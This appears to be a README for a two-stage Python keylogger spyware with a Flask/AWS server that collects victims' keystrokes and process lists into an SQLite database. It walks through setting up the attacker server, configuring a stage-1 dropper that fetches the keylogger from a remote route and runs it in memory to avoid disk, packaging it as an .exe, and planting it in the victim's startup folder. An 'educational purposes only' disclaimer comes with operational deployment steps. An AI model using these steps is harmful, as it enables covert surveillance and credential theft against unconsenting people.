A python spyware which acts as a keylogger and logs keys from the target PC using REST APIs made in flask, the payload has been divided into a two stage payload and instructions to use are given below.
A spyware developed to hack hardware device(keyboard) and send it's data to the online attacker's server. (STRICTLY DEVELOPED FOR EDUCATIONAL PURPOSES ONLY)
- View the keylogs of each target PC arranged in sqlite tables in the database by their usernames.
- Get a view of the top 10 processes running on the target system along with their uptime arranged by there memory consumption
- An Extensive admin panel on the webapp with login functionalities and route secrutiy to view keylogs.
- A database to store keylogs along with username and timestamp.
1.) Make a server online using AWS or other onlie hosting service and make necessary changes to allow inbound connections on port 8000 or the port of your choice.
The original payload isn't provided to prevent malicious use, email us on [email protected] to gain access to the original payload along with instructions of setting it up for research purposes.
2.) Edit line 56 of app.py and providing the path to your edited and obfuscated stage2_keylogger.py provided by us after storing on your AWS server.)
3.) In line 106 of app.py add your username and password for route security
4.) Create a sqlite3 database dope.db of the following schema -
sqlite> .schema
CREATE TABLE data (pcname text, mac text , data text, time text);
CREATE TABLE admin_users(username text primary key, hash text required);
CREATE TABLE pslist(pcname text primary key, prcslist text, lastupdated text);
5.) Add an admin user to login into the admin plan INSERT INTO admin_users(username, hash) VALUES ('your_username_here','your_complete_password_hash_generated_using_werkzeug.security_library')
6.) HOST the flask app on your AWS server for it to be accessible over the internet.
1.) In line 16 of the stage1_payload.py edit the url to match with your flask route http://<ip>:<port>/dwfile. The stage1 payload downloads the keylogger file using web requests and execute it in the memory without writing it on the disk.
2.) Convert the stage1_payload.py in a standalone executable file using pyinstaller or any other tool of your choice.
<br.
Now all you have to do is transfer the .exe file into the victim pc, preferably store it in the startup folder so that it is automatically started everytime the pc boots.
Python- for the spyware scripts.AWS- for hosting.sqlite3- for database.flask- for Webapp and REST API developement.gunicorn- for implimenting WSGI ( Web Server Gateway Interface ).
Made during 🌙 by flat chicklets